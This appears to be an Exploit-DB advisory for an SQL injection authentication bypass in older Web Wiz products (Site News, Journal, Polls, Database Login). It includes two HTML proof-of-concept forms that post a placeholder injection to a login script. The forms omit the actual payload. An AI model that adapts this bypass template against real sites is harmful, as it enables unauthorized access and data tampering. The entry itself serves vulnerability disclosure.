Web Wiz (Multiple Products) - SQL Injection

EDB-ID:

26991

CVE:

N/A

Author:

DevilBox

Type:

webapps

Platform:

ASP

Published:

2005-12-30

source: http://www.securityfocus.com/bid/16085/info

Multiple Products by Web Wiz are prone to an SQL injection vulnerability.

Successful exploitation can allow an attacker to bypass authentication and gain unauthorized access to a site.

Attacks may also result in disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97 are vulnerable to this issue. Prior versions are reportedly affected as well. 

<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>